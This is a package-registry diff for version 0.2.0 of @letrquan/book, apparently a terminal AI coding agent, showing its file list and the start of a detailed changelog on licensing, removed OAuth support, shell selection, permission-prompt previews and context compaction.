@letrquan/book 0.2.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/CHANGELOG.md +2504 -0
- package/LICENSE +123 -0
- package/README.md +1383 -0
- package/dist/app-MOXXWEOY.js +18945 -0
- package/dist/app-MOXXWEOY.js.map +1 -0
- package/dist/chunk-24AXE6SP.js +12 -0
- package/dist/chunk-24AXE6SP.js.map +1 -0
- package/dist/chunk-3U5IBM24.js +213 -0
- package/dist/chunk-3U5IBM24.js.map +1 -0
- package/dist/chunk-574C6MQR.js +743 -0
- package/dist/chunk-574C6MQR.js.map +1 -0
- package/dist/chunk-5GDZ22YP.js +449 -0
- package/dist/chunk-5GDZ22YP.js.map +1 -0
- package/dist/chunk-5KLVH3PY.js +167 -0
- package/dist/chunk-5KLVH3PY.js.map +1 -0
- package/dist/chunk-5RDRAO4B.js +92 -0
- package/dist/chunk-5RDRAO4B.js.map +1 -0
- package/dist/chunk-7N4J557C.js +10 -0
- package/dist/chunk-7N4J557C.js.map +1 -0
- package/dist/chunk-A7JLBK2Y.js +3506 -0
- package/dist/chunk-A7JLBK2Y.js.map +1 -0
- package/dist/chunk-ANSJPYGI.js +84 -0
- package/dist/chunk-ANSJPYGI.js.map +1 -0
- package/dist/chunk-BTZZUCLI.js +264 -0
- package/dist/chunk-BTZZUCLI.js.map +1 -0
- package/dist/chunk-C7D4NJ2D.js +217 -0
- package/dist/chunk-C7D4NJ2D.js.map +1 -0
- package/dist/chunk-CAGOB2N4.js +208 -0
- package/dist/chunk-CAGOB2N4.js.map +1 -0
- package/dist/chunk-DGMQEI6Y.js +98 -0
- package/dist/chunk-DGMQEI6Y.js.map +1 -0
- package/dist/chunk-E75IPST5.js +289 -0
- package/dist/chunk-E75IPST5.js.map +1 -0
- package/dist/chunk-EYGD6X2T.js +180 -0
- package/dist/chunk-EYGD6X2T.js.map +1 -0
- package/dist/chunk-GTVB4HEM.js +765 -0
- package/dist/chunk-GTVB4HEM.js.map +1 -0
- package/dist/chunk-J7MIZ5CA.js +1907 -0
- package/dist/chunk-J7MIZ5CA.js.map +1 -0
- package/dist/chunk-KWHQ2XXL.js +626 -0
- package/dist/chunk-KWHQ2XXL.js.map +1 -0
- package/dist/chunk-L6LK2QIQ.js +657 -0
- package/dist/chunk-L6LK2QIQ.js.map +1 -0
- package/dist/chunk-MAQXCUR4.js +1007 -0
- package/dist/chunk-MAQXCUR4.js.map +1 -0
- package/dist/chunk-S4XL7HOM.js +402 -0
- package/dist/chunk-S4XL7HOM.js.map +1 -0
- package/dist/chunk-URLQAXTR.js +60 -0
- package/dist/chunk-URLQAXTR.js.map +1 -0
- package/dist/chunk-V4BOYR52.js +3504 -0
- package/dist/chunk-V4BOYR52.js.map +1 -0
- package/dist/chunk-VZQXX3WW.js +210 -0
- package/dist/chunk-VZQXX3WW.js.map +1 -0
- package/dist/chunk-WKBO5R4O.js +34 -0
- package/dist/chunk-WKBO5R4O.js.map +1 -0
- package/dist/chunk-XIFFTATU.js +15753 -0
- package/dist/chunk-XIFFTATU.js.map +1 -0
- package/dist/command-approvals-6Y57VCWZ.js +28 -0
- package/dist/command-approvals-6Y57VCWZ.js.map +1 -0
- package/dist/context-ZC5IFEAX.js +25 -0
- package/dist/context-ZC5IFEAX.js.map +1 -0
- package/dist/hook-approvals-CTUFKEJT.js +22 -0
- package/dist/hook-approvals-CTUFKEJT.js.map +1 -0
- package/dist/index.d.ts +1 -0
- package/dist/index.js +2582 -0
- package/dist/index.js.map +1 -0
- package/dist/interactive-assets-CCAAWVKH.js +31 -0
- package/dist/interactive-assets-CCAAWVKH.js.map +1 -0
- package/dist/job-runner.d.ts +2 -0
- package/dist/job-runner.js +235 -0
- package/dist/job-runner.js.map +1 -0
- package/dist/loader-4IDS2RIE.js +15 -0
- package/dist/loader-4IDS2RIE.js.map +1 -0
- package/dist/mcp-approvals-WNPH65BK.js +18 -0
- package/dist/mcp-approvals-WNPH65BK.js.map +1 -0
- package/dist/mcp-config-YIJIES2C.js +16 -0
- package/dist/mcp-config-YIJIES2C.js.map +1 -0
- package/dist/model-window-store-YFVNXCIP.js +27 -0
- package/dist/model-window-store-YFVNXCIP.js.map +1 -0
- package/dist/openai-compatible-RHZUBHV6.js +10 -0
- package/dist/openai-compatible-RHZUBHV6.js.map +1 -0
- package/dist/permission-approvals-76PVREFD.js +14 -0
- package/dist/permission-approvals-76PVREFD.js.map +1 -0
- package/dist/permissions-CHCKTFQQ.js +28 -0
- package/dist/permissions-CHCKTFQQ.js.map +1 -0
- package/dist/sandbox-CNVAQDA7.js +23 -0
- package/dist/sandbox-CNVAQDA7.js.map +1 -0
- package/dist/scrollback-LUKLIBVI.js +136 -0
- package/dist/scrollback-LUKLIBVI.js.map +1 -0
- package/dist/sdk.d.ts +4574 -0
- package/dist/sdk.js +665 -0
- package/dist/sdk.js.map +1 -0
- package/dist/settings-loader-M2QP5TX2.js +21 -0
- package/dist/settings-loader-M2QP5TX2.js.map +1 -0
- package/dist/settings-removed-JWWPT4WA.js +19 -0
- package/dist/settings-removed-JWWPT4WA.js.map +1 -0
- package/dist/shell-selection-V6QAYXPX.js +17 -0
- package/dist/shell-selection-V6QAYXPX.js.map +1 -0
- package/package.json +143 -0
- package/patches/ink+6.8.0.patch +13 -0
- package/scripts/apply-ink-patch.mjs +29 -0
- package/scripts/ink-patch.mjs +59 -0
- package/scripts/verify-ink-patch.mjs +11 -0
package/CHANGELOG.md
ADDED
|
@@ -0,0 +1,2504 @@
|
|
|
1
|
+
# Changelog
|
|
2
|
+
|
|
3
|
+
All notable changes to this project are documented in this file.
|
|
4
|
+
|
|
5
|
+
## [Unreleased]
|
|
6
|
+
|
|
7
|
+
## [0.2.0] - 2026-09-08
|
|
8
|
+
|
|
9
|
+
### Added
|
|
10
|
+
|
|
11
|
+
- **Book is published: `npm install -g @letrquan/book`.** The first release anyone outside this
|
|
12
|
+
repository can install. The command is still `book`; the package is scoped because the unscoped
|
|
13
|
+
npm name was taken years ago. `private: true` is gone from `package.json`, deliberately.
|
|
14
|
+
|
|
15
|
+
### Changed
|
|
16
|
+
|
|
17
|
+
- **Licence: PolyForm Small Business 1.0.0, replacing "all rights reserved".** Publishing a package
|
|
18
|
+
invites people to install and run it, which the previous licence granted no permission to do —
|
|
19
|
+
a contradiction that would have made the release useless to the users it was meant to reach.
|
|
20
|
+
The new terms are source-available: read, modify and redistribute freely, and use it for your own
|
|
21
|
+
work or a company with fewer than 100 people and under 1,000,000 USD (2019) revenue. Larger
|
|
22
|
+
commercial use needs a separate licence. This is not an open-source licence, and does not pretend
|
|
23
|
+
to be one.
|
|
24
|
+
|
|
25
|
+
The published tarball contains source maps with the full TypeScript source. That is now a choice
|
|
26
|
+
rather than an oversight: the licence makes reading the source a right.
|
|
27
|
+
|
|
28
|
+
### Fixed
|
|
29
|
+
|
|
30
|
+
- **A published install would have had no `book` command.** `bin.book` carried a `./` prefix, and
|
|
31
|
+
`npm publish` drops a bin entry whose path it considers malformed — silently, after which the
|
|
32
|
+
package installs cleanly and provides nothing to run. `npm pack` keeps the entry verbatim and the
|
|
33
|
+
package smoke test invoked `dist/index.js` directly, so neither could see it; only the
|
|
34
|
+
publish-time warning named it. The path is fixed and `scripts/package-smoke.ts` now asserts the
|
|
35
|
+
format at pack time, verified by reintroducing the bug and watching the check fail.
|
|
36
|
+
|
|
37
|
+
### Known
|
|
38
|
+
|
|
39
|
+
- npm 11 blocks install scripts by default, so the Ink patch does not apply on a fresh
|
|
40
|
+
`npm install -g @letrquan/book`. Book already detects an unpatched Ink and falls back to the
|
|
41
|
+
full-frame `safe` renderer, so the TUI is correct either way — it simply redraws more on macOS
|
|
42
|
+
and Linux, where `incremental` would otherwise be the default. `npm approve-scripts` opts back in.
|
|
43
|
+
|
|
44
|
+
### Removed
|
|
45
|
+
|
|
46
|
+
- **The adaptive harness and the experimental Zero-Mem capability.** Both were default-off research
|
|
47
|
+
surfaces that no shipped configuration reached, and together they were roughly 10,600 lines —
|
|
48
|
+
about a ninth of the codebase — that every change to the live paths had to be reasoned around.
|
|
49
|
+
|
|
50
|
+
Neither was close to earning that. The harness ledger's own eligibility check reported directory
|
|
51
|
+
sync unavailable, so no `observe` run ever produced promotion-eligible evidence; of its ten
|
|
52
|
+
planned phases three were built and the selector that would have made it a learning system was
|
|
53
|
+
not among them. Zero-Mem needed an optional `@huggingface/transformers` peer and a locally cached
|
|
54
|
+
embedding/NER pair before it could answer a single turn.
|
|
55
|
+
|
|
56
|
+
Gone with them: the `harness.*` and `experimental.*` settings blocks, the `--harness-workflow`
|
|
57
|
+
flag, `BOOK_EXPERIMENTAL_ZERO_MEM`, `BOOK_ZERO_MEM_MODEL_CACHE`, `BOOK_ZERO_MEM_LOCAL_FILES_ONLY`,
|
|
58
|
+
`BOOK_COMPACT_STRATEGY`, the `eval:zero-mem` script, and the `@huggingface/transformers` peer
|
|
59
|
+
dependency. Production summary compaction is untouched, including the Carried Ledger and the
|
|
60
|
+
residual tail; `compactStrategy` remains `summary` and is now the only strategy.
|
|
61
|
+
|
|
62
|
+
**A removed setting costs you the key, not your install.** `compactStrategy: "zero-mem"` would
|
|
63
|
+
otherwise fail the whole settings document against the surviving literal type and stop Book from
|
|
64
|
+
starting, with a validator dump naming no remedy — so removed values are dropped and removed
|
|
65
|
+
blocks are reported instead. `book doctor` lists the removed keys still present in each settings
|
|
66
|
+
layer and in the environment, and says what to delete.
|
|
67
|
+
|
|
68
|
+
- **Subscription authentication over OAuth.** Book supports API-key authentication only. The
|
|
69
|
+
`book auth` subcommand (`login`, `logout`, `status`), the `/login` slash command and TUI login
|
|
70
|
+
picker, the `auth` configuration block, and subscription credential resolution across provider
|
|
71
|
+
transports have been removed entirely, without shims or compatibility aliases.
|
|
72
|
+
|
|
73
|
+
The feature could not work as shipped. Book bundled no vendor client IDs, which required users to
|
|
74
|
+
supply their own OAuth client ID that neither Anthropic nor OpenAI publishes for third-party CLI
|
|
75
|
+
use. In addition, the built-in `codex` profile targeted an endpoint that the OpenAI-compatible client
|
|
76
|
+
cannot speak (it appends `/chat/completions`, whereas that host serves the Responses API). Carrying
|
|
77
|
+
a non-functional credential path is worse than not having one; Book now authenticates exclusively
|
|
78
|
+
via API keys (`BOOK_API_KEY`, `provider.<id>.apiKey`, and `{env:VAR}` references).
|
|
79
|
+
|
|
80
|
+
**If you ever ran `book auth login`, delete `<BOOK_HOME>/auth.json`** (normally
|
|
81
|
+
`~/.book/auth.json`) and revoke the token with the provider. It holds a long-lived OAuth refresh
|
|
82
|
+
token that nothing in Book reads, reports or revokes any more; the file is left in place rather
|
|
83
|
+
than deleted for you, because a tool that removes credentials without being asked is worse than
|
|
84
|
+
one that tells you they are there. `book doctor` names the file while it exists, and the "no
|
|
85
|
+
credential" error names the removal when a stale `auth` block was your only configured one.
|
|
86
|
+
|
|
87
|
+
### Changed
|
|
88
|
+
|
|
89
|
+
- **New default theme: `apple`.** The interactive TUI now opens on a calmer, Apple-inspired
|
|
90
|
+
palette — near-black neutral surfaces, bright grey text, and one blue accent for the things you
|
|
91
|
+
act on (the composer and your own turns). Every other hue is a status colour that appears only
|
|
92
|
+
when a state needs attention, so ordinary chrome never competes with the work. `/theme auto` on a
|
|
93
|
+
dark terminal also resolves to `apple`. The previous warm editorial palette is still available as
|
|
94
|
+
`/theme dark`, and an explicit `theme` setting is honoured unchanged.
|
|
95
|
+
- The composer keeps a steady focus frame instead of recolouring its border with every permission
|
|
96
|
+
mode; the status line carries the mode, and reserves saturated colour for non-default modes,
|
|
97
|
+
warnings, and context pressure near the limit. Healthy usage stays quiet.
|
|
98
|
+
- Inline code in assistant replies is marked by colour alone; the background pill behind every
|
|
99
|
+
span is gone, so a paragraph full of identifiers no longer reads as a row of badges. The
|
|
100
|
+
`mdInlineCodeBg` token is still accepted in custom theme files but no longer paints anything.
|
|
101
|
+
|
|
102
|
+
### Fixed
|
|
103
|
+
|
|
104
|
+
- **`Bash` no longer runs through `cmd.exe` on Windows.** Node's `shell: true` means `%ComSpec%`,
|
|
105
|
+
so a tool named `Bash` was spawning `cmd.exe`: one command per line, `%VAR%` quoting, no
|
|
106
|
+
heredocs, and the shell models write worst. The system prompt told the model to expect that
|
|
107
|
+
rather than fixing it, which traded the model's strongest syntax for its weakest on the one
|
|
108
|
+
platform Book is developed on — where `Bash` is by some distance the most-failing tool.
|
|
109
|
+
|
|
110
|
+
Book now resolves a real shell once per session and tells the model which one it got. On Windows:
|
|
111
|
+
`BOOK_SHELL` or the `shell` setting, then **Git Bash when Book was launched from one**, then
|
|
112
|
+
**PowerShell 7**, then **Windows PowerShell 5.1**, then an installed Git Bash, and `cmd.exe` only
|
|
113
|
+
when nothing else exists. macOS and Linux keep the platform default. The resolved shell rides on
|
|
114
|
+
the config, so the tool, the system prompt, and `book doctor` cannot disagree about which shell
|
|
115
|
+
is in force, and the Harness prompt line now states that shell's actual syntax rules instead of
|
|
116
|
+
warning the model off Windows.
|
|
117
|
+
|
|
118
|
+
A real shell is spawned as an argument vector, reusing the form sandboxing already used;
|
|
119
|
+
`cmd.exe` and `/bin/sh` still go through `shell: true`, because `cmd.exe` quoting cannot be
|
|
120
|
+
reproduced from an argv. PowerShell is driven with `-EncodedCommand`, since 5.1 re-parses a
|
|
121
|
+
`-Command` argument and silently strips embedded double quotes. Under 5.1 the error stream is
|
|
122
|
+
merged and each record rendered as text: left alone, that shell serializes a redirected stderr as
|
|
123
|
+
CLIXML, so a failing `Get-Item` handed the model an XML document instead of `Cannot find path`.
|
|
124
|
+
Exit codes still follow the last statement, verified against the real interpreter.
|
|
125
|
+
|
|
126
|
+
`shell` is stripped from both workspace settings layers and refused by `book config` there, on
|
|
127
|
+
the same reasoning as `auth`: it names the program every command is handed to, so a repository
|
|
128
|
+
that could set it would run a binary it ships on the first call.
|
|
129
|
+
|
|
130
|
+
- **Inline reasoning tags no longer leak into a subagent's live transcript.** Routers that inline
|
|
131
|
+
a model's thinking as `<think>…</think>` emit an empty block ahead of every tool call. Each one
|
|
132
|
+
rendered as a `thought · 0 lines` row — a toggle that expanded to nothing — stacked between every
|
|
133
|
+
wave of tool rows, in both the main transcript and a child's. Empty blocks are now dropped. While
|
|
134
|
+
a managed child's turn was still open, its detail view printed the raw stream buffer, so the same
|
|
135
|
+
reasoning that the settled transcript collapses to a `thought` row appeared verbatim, tags and
|
|
136
|
+
all; the live turn is now rendered as a streaming assistant message, with the same reasoning
|
|
137
|
+
split, markdown, and width as every settled one, and honours `ui.showThinking`. The buffer that
|
|
138
|
+
drives it is also cleared when the finished message lands, so the text no longer showed twice
|
|
139
|
+
and no longer accumulated across the child's later turns.
|
|
140
|
+
- **A print run that was cut off no longer reports success.** `--print` ended with exit code 0 after
|
|
141
|
+
emitting `Reached max turns (150)`, so a CI step, a wrapper that resumes on failure, or any script
|
|
142
|
+
reading `$?` could not tell a finished objective from one abandoned at the turn limit. In print
|
|
143
|
+
mode the exit code is the whole contract — there is no human watching the transcript to notice.
|
|
144
|
+
|
|
145
|
+
The agent loop had already done its half: the max-turns branch produces a `failed` terminal
|
|
146
|
+
outcome, as do `no_progress`, `blocked_plan`, `continuation_limit` and a budget stop. What was
|
|
147
|
+
missing was the last hop — the CLI awaited the headless run and discarded its result, so the
|
|
148
|
+
process fell through to 0. It now reads the outcome and exits 1 on any failed status, keyed on the
|
|
149
|
+
status rather than on the reason, so a failure mode added later is covered without being
|
|
150
|
+
remembered.
|
|
151
|
+
|
|
152
|
+
**A user cancelling is not a failure.** Ctrl-C and an abort signal keep exiting as they did, with
|
|
153
|
+
a test pinning it, so a later change cannot quietly turn someone pressing Ctrl-C into a red CI
|
|
154
|
+
run. And because a consumer parsing the stream should not have to infer this from an exit code,
|
|
155
|
+
the `result` event now carries `stopReason`.
|
|
156
|
+
|
|
157
|
+
- **A learned context window can no longer be lost, raised, or set above the real window.** Book
|
|
158
|
+
records a ceiling for a model when a provider refuses a request for exceeding its context limit,
|
|
159
|
+
in `<BOOK_HOME>/model-windows.json`, so the next session sizes compaction against a number the
|
|
160
|
+
provider has shown it will not accept. A review of that store found the recorded number was
|
|
161
|
+
wrong in three independent ways, each of which the file's own design claimed to prevent.
|
|
162
|
+
|
|
163
|
+
**The value was the size that was refused.** History alone can exceed the window — a 100k model
|
|
164
|
+
handed 150k of history refuses, and 150k was stored as the window, half again larger than
|
|
165
|
+
reality. The ceiling is now a fixed fraction of the refused size
|
|
166
|
+
(`LEARNED_WINDOW_SAFETY_MARGIN`), so it lands below the real window in one step instead of
|
|
167
|
+
decaying toward it through a sequence of failed turns the user watches. The old comment argued
|
|
168
|
+
the estimate was conservative by comparing it to the refused *prompt*; the value is stored as the
|
|
169
|
+
*window*, so that reasoning never applied to what the code did.
|
|
170
|
+
|
|
171
|
+
**"Strictly downward" only held inside one process.** The store cached the file at session start
|
|
172
|
+
and wrote the whole document back from that snapshot, so two concurrent sessions — a TUI beside a
|
|
173
|
+
`--print` run, managed agents in worktrees, a background job — dropped each other's entries, and
|
|
174
|
+
a session holding a stale snapshot would happily restore a ceiling another had just lowered.
|
|
175
|
+
A write is now computed from a fresh read and merged per model by minimum, so a concurrent
|
|
176
|
+
lowering is never undone.
|
|
177
|
+
|
|
178
|
+
**One malformed entry discarded all of them.** The document was validated in a single pass, so a
|
|
179
|
+
truncated write, a hand edit, or an entry written by a future version emptied the store for every
|
|
180
|
+
model — and the next refusal persisted that empty document, making it permanent. Entries are now
|
|
181
|
+
validated individually and a bad one costs only itself; a file whose version is newer than this
|
|
182
|
+
build is read but never rewritten.
|
|
183
|
+
|
|
184
|
+
Alongside: `book doctor` lists every learned window and when it was learned, `/context` and the
|
|
185
|
+
status line name which source the window came from, and the family table gained `gpt-4` (8k),
|
|
186
|
+
`gpt-4-32k` (32k), and `gpt-3.5-turbo` (16k) — the families where falling back to the 272k
|
|
187
|
+
default is most dangerous, and the ones the table's own sizing rule was written for. A window
|
|
188
|
+
declared in settings still wins over everything above.
|
|
189
|
+
|
|
190
|
+
- **A turn that is only an unclosed reasoning block is retried, not accepted as the answer.** A
|
|
191
|
+
`--print` run finished with exit code 0 and an "answer" that was leaked chain-of-thought from its
|
|
192
|
+
first byte to its last: one `<reasoning_context>` tag, never closed, ending mid-sentence on a tool
|
|
193
|
+
call the model had serialized as prose. The empty-turn check reads only closed tags on purpose —
|
|
194
|
+
a finished answer may open with an unfenced `<thinking>`, and stripping it would fail a run that
|
|
195
|
+
had answered — so the leak passed as a reply, and in print mode nothing downstream could tell.
|
|
196
|
+
|
|
197
|
+
The discriminator is the shape itself: the block starts the content, is never closed, and no
|
|
198
|
+
answer text stands beside it. That turn now gets the same single retry an empty turn gets
|
|
199
|
+
(`isUnclosedReasoningOnly` in `src/reasoning-tags.ts`), since there is no answer there to
|
|
200
|
+
protect. If the retry comes back the same shape the text is kept as the answer, as before, never
|
|
201
|
+
discarded — so the worst case for an answer that merely opens with `<thinking>` is one spare
|
|
202
|
+
request. Text before the opening tag, a tool call, or a closed block leave the reading unchanged.
|
|
203
|
+
|
|
204
|
+
- **The permission prompt shows what is being approved.** The card is where consent is given, and
|
|
205
|
+
it rendered the whole payload as a fixed 72-character slice with nothing marking the cut, so a
|
|
206
|
+
command that continued past that point read as if it ended there — `… && echo cleaned` for a
|
|
207
|
+
command whose tail was the part worth reading — with half the row left empty. File mutations
|
|
208
|
+
were worse: `Edit`, `MultiEdit`, `Write`, and `ApplyPatch` showed only the path, because the
|
|
209
|
+
diff those tools return exists only after the file is written. The user was asked to approve a
|
|
210
|
+
change they could not see.
|
|
211
|
+
|
|
212
|
+
A shell command now renders in full, every line of it, hard-wrapped to the card's interior
|
|
213
|
+
rather than word-wrapped, since a command's spacing is part of the command. When it still needs
|
|
214
|
+
a bound the bound is a count of rows, the cut is marked (`… 7 more rows · D shows all`), and `D`
|
|
215
|
+
opens it. A short argument stays on the header row as before.
|
|
216
|
+
|
|
217
|
+
File mutations show the diff they would produce, computed before anything is written from the
|
|
218
|
+
pending call's arguments against the file on disk, with the same matching the tool will use
|
|
219
|
+
(`src/tools/mutation-preview.ts`, reusing the tools' own edit and hunk appliers and rendered
|
|
220
|
+
through the transcript's `DiffBlock`). A change that cannot be previewed says why — `Cannot
|
|
221
|
+
preview: oldString not found in file`, or a patch that names one file twice — which is the
|
|
222
|
+
matching failure the tool was about to report, so the user can skip a call that is going to
|
|
223
|
+
fail instead of approving it first. (The tools' file-provenance gate, which refuses to mutate a
|
|
224
|
+
file the session has not read, is not previewed.) Previews are change-focused and bounded by
|
|
225
|
+
the terminal: eight diff rows on a tall terminal, fewer on a short one, and a patch across many
|
|
226
|
+
files shows as many as that budget can give a meaningful diff and counts the rest; `D` opens
|
|
227
|
+
them to what the terminal can hold, and is offered only when it would show more. A
|
|
228
|
+
worktree-isolated managed agent previews against its own checkout. The screen-reader rendering
|
|
229
|
+
reads the whole command and a per-file summary of lines added and removed.
|
|
230
|
+
|
|
231
|
+
Along the way the line diff (`src/tools/diff.ts`) now trims the lines shared at both ends
|
|
232
|
+
before building its LCS table, so a one-line edit deep in a twenty-thousand-line file costs a
|
|
233
|
+
handful of cells rather than four hundred million; the mutation tools, which run the same diff
|
|
234
|
+
after every write, get the same saving.
|
|
235
|
+
|
|
236
|
+
### Added
|
|
237
|
+
|
|
238
|
+
- **Learned context-window store and downward ratchet on provider overflow.** For unknown models
|
|
239
|
+
or local routers whose `/v1/models` endpoint exposes no context lengths, Book now learns a context
|
|
240
|
+
ceiling from the provider's context overflow refusal instead of repeating the overflow every session.
|
|
241
|
+
|
|
242
|
+
Learned ceilings are stored per model in `<BOOK_HOME>/model-windows.json` (via atomic temp-file replace),
|
|
243
|
+
isolated from the workspace tree so repositories cannot tamper with learned limits. When a provider
|
|
244
|
+
refuses a request with a context overflow error and the context window in force was not explicitly
|
|
245
|
+
declared by the user in settings, the conservative history token estimate at the moment of refusal is
|
|
246
|
+
recorded. The ratchet is strictly monotonic downward: subsequent overflows at a smaller size lower the
|
|
247
|
+
ceiling, while overflows at larger sizes change nothing, and explicit user settings declarations remain
|
|
248
|
+
authoritative and are never overwritten.
|
|
249
|
+
|
|
250
|
+
`ContextWindowSource` is extended with `'learned'` in the four-state precedence:
|
|
251
|
+
`declared -> learned -> family -> default`. The learned origin is surfaced in `/context` breakdown
|
|
252
|
+
reports with an explanation of the refusal signal, in the `/context` command panel metric card
|
|
253
|
+
(`(learned)`), and as a trailing annotation on the responsive TUI status line (`(learned)` on wide
|
|
254
|
+
terminals).
|
|
255
|
+
|
|
256
|
+
- **Model family context-window table and three-state source reporting.** Previously,
|
|
257
|
+
`resolveContextLimit()` returned the fallback `DEFAULT_CONTEXT_WINDOW = 272_000` for every model
|
|
258
|
+
that did not explicitly declare a per-model `contextWindow` in settings. On 1M-context models such
|
|
259
|
+
as Gemini Flash behind router prefixes (`9router/ag/gemini-3.8-flash-high`), premature
|
|
260
|
+
auto-compactions were triggered against the 272k ceiling.
|
|
261
|
+
|
|
262
|
+
Book now resolves context windows through `resolveContextWindow()` across a three-state source
|
|
263
|
+
precedence: explicit declaration in `modelInfo.contextWindow` (`declared`), matching a known
|
|
264
|
+
conservative family prior (`family`), or the product fallback (`default`). A built-in family
|
|
265
|
+
table covers Gemini Flash (1,048,576 tokens), Claude 3+ (200,000 tokens), GPT-4o (128,000 tokens),
|
|
266
|
+
GPT-4 Turbo (128,000 tokens), and OpenAI o-series (128,000 tokens), stripping router paths and date
|
|
267
|
+
stamps during normalization; families whose published window varies too widely across variants
|
|
268
|
+
— Qwen being the case in point, 32k to 1M — are deliberately left to the default so the user is
|
|
269
|
+
prompted to declare one. The three-state source is threaded through `/context` reports, the
|
|
270
|
+
`/context` command panel metric card (`(default)`, `(family)`, or unadorned when declared), and the
|
|
271
|
+
responsive TUI status line (`(family)` or `(default)` on wide terminals, dropping out first when
|
|
272
|
+
space is tight). Because initial tool discovery derives its schema token budget from
|
|
273
|
+
`window * 0.05`, models resolving to 128k families receive a proportionally tightened eager tool
|
|
274
|
+
catalog (6,400 tokens, down from the 8,000-token cap applied at 272k).
|
|
275
|
+
|
|
276
|
+
- **`/login` — subscription sign-in from inside the TUI.** Subscription auth shipped as
|
|
277
|
+
`book auth login` and nothing else: no slash command, no import from `src/auth/` anywhere under
|
|
278
|
+
`src/tui/`, and no credential row in `/status`. A user who never left the TUI had no way to
|
|
279
|
+
discover the feature existed, and no way to see which credential a session was spending.
|
|
280
|
+
|
|
281
|
+
`/login` now lists the configured profiles with their credential and client-id state, opens the
|
|
282
|
+
browser, waits on the loopback redirect, and reports the outcome — driving the same
|
|
283
|
+
`runOAuthLogin` the CLI drives, which was written host-agnostically for this. `/login <profile>`
|
|
284
|
+
preselects one rather than auto-starting, so a flow that opens a browser and binds a registered
|
|
285
|
+
port always begins on a keystroke the user aimed. Esc aborts in flight, and the overlay's effect
|
|
286
|
+
cleanup aborts on unmount, so a closed overlay cannot leave the listener holding the port.
|
|
287
|
+
Selecting a profile with no client id shows the same guidance the CLI prints without binding
|
|
288
|
+
anything. `/status` gained an `Auth` row naming the active profile, or `API key`.
|
|
289
|
+
|
|
290
|
+
**Storing a credential does not spend it.** `selectAuthProfile` deliberately refuses to retarget
|
|
291
|
+
a workspace that already has a working key, and the TUI only started because something
|
|
292
|
+
authenticated — so inferred activation would have left the new login doing nothing visible,
|
|
293
|
+
reproducing inside the feature the invisibility that motivated it. The success step asks; accepting
|
|
294
|
+
persists `auth.profile` to the user-global layer (the only layer `auth.*` is read from) and
|
|
295
|
+
re-points the live config, so the next turn spends the subscription without a restart. Declining
|
|
296
|
+
says how to switch later.
|
|
297
|
+
|
|
298
|
+
**Activation is resolved before it is offered.** Because it persists `auth.profile` globally, a
|
|
299
|
+
combination that cannot work would not just fail this session — it would fail every later session
|
|
300
|
+
in every project, from a single keystroke, with no way back through the overlay. So
|
|
301
|
+
`activateAuthProfile` computes the outcome first and refuses with a reason when a base-URL
|
|
302
|
+
override points away from the profile's origin (where `assertOriginAllowed` would reject every
|
|
303
|
+
request), when the selected model resolves to a `provider/<id>` entry that carries its own
|
|
304
|
+
endpoint and key, or when `BOOK_AUTH_PROFILE` names something else. Nothing is written in those
|
|
305
|
+
cases. A compact model configured for the previous vendor is reported as a warning instead. The
|
|
306
|
+
consent prompt names the model and endpoint the session will really use, which differs from the
|
|
307
|
+
profile's own whenever an explicit override wins — and `/model` now records its choice as
|
|
308
|
+
explicit, so a later login cannot quietly undo it.
|
|
309
|
+
|
|
310
|
+
The endpoint/model/transport precedence an active profile contributes now lives in one exported
|
|
311
|
+
function (`authProfileContribution`), called by both `loadConfig` and the mid-session path.
|
|
312
|
+
Two copies would drift, and drift here is silent: a session spending a subscription against the
|
|
313
|
+
wrong endpoint, or keeping a model the new vendor does not serve.
|
|
314
|
+
|
|
315
|
+
Logout and the `--manual` paste-back flow remain CLI-only.
|
|
316
|
+
|
|
317
|
+
### Changed
|
|
318
|
+
|
|
319
|
+
- **Compaction keeps the recent history it is entitled to (Carried Ledger Phase 1).** After an
|
|
320
|
+
auto-compaction the retained tail was capped at a flat 20,000 tokens whatever the window, and a
|
|
321
|
+
single turn with dozens of tool calls exceeds that even after clipping, so at the 272k default
|
|
322
|
+
window compaction kept nothing verbatim: seven of eight real compactions in the owner's sessions
|
|
323
|
+
retained zero messages and collapsed 167k-219k tokens to a 0.2k-6.7k checkpoint. The tail is now
|
|
324
|
+
the residual of the post-compaction target (`resolveCompactBudgets` in `src/agent/compact.ts`).
|
|
325
|
+
The target is half the loop's preflight gate net of the request overhead the loop measures
|
|
326
|
+
(system prompt, tool schemas, session state), so after a compaction the whole request sits at
|
|
327
|
+
half the gate and the next compaction is as far away as the request is large; the tail is that
|
|
328
|
+
target less the checkpoint budget and its header. At 272k with the 64k default reserve that is
|
|
329
|
+
~79k tokens of verbatim recent history with no overhead, ~73k against this repository's ~12k
|
|
330
|
+
prompt, instead of 20k. The loop and the compactor size from the one resolver, so the output
|
|
331
|
+
reserve is clamped to half the window on both sides: a 32k local model under Book's 64k default
|
|
332
|
+
reserve was refused every tool-bearing request before the provider was called (issue #189). The
|
|
333
|
+
per-result clip scales with the tail (~7.9k tokens per retained tool result at 272k instead of
|
|
334
|
+
2k) and the loop's preflight clip uses the same cap, falling back to the flat cap only when the
|
|
335
|
+
request would still be refused. The short 20k tail stays where it is the right answer: the
|
|
336
|
+
recovery compaction after a provider rejects a request as too large always keeps it, because the
|
|
337
|
+
residual was sized for a window the provider has just said it does not have, and every trigger
|
|
338
|
+
falls back to it when the residual would summarize nothing. A compaction that fires on
|
|
339
|
+
provider-measured usage also shrinks its target by the ratio of measured to estimated tokens, so
|
|
340
|
+
an undercounting estimator (CJK prose, base64) cannot size a tail that does not fit. The fidelity
|
|
341
|
+
harness runs two arms, a 32k window with a 4k reserve and the 272k production window, with
|
|
342
|
+
per-arm floors in `FIDELITY_ARMS`: post-history utilization is measured against the loop's own
|
|
343
|
+
gate and flipped from a 0.15 ceiling to a floor (0.47 and 0.48 measured), final retention at 272k
|
|
344
|
+
measured 0.833, and retention precision is recorded per arm because the old 0.898 mostly measured
|
|
345
|
+
an empty tail. Cost: post-compaction requests carry ~4x more history and compactions fire more
|
|
346
|
+
often (the headroom to the next preflight at 272k is the post-compaction request itself, ~83k
|
|
347
|
+
tokens, instead of ~140k). The `run-book` mock provider gained content-matched turns so a scripted
|
|
348
|
+
session survives the reducer's request landing at any index, an `--overflow-above` switch that
|
|
349
|
+
refuses oversized requests the way a model with a smaller real window does, and a request log in
|
|
350
|
+
the OS temp directory.
|
|
351
|
+
|
|
352
|
+
- **The TUI uses the whole terminal — and its floating panels still don't.** Every row resolved its
|
|
353
|
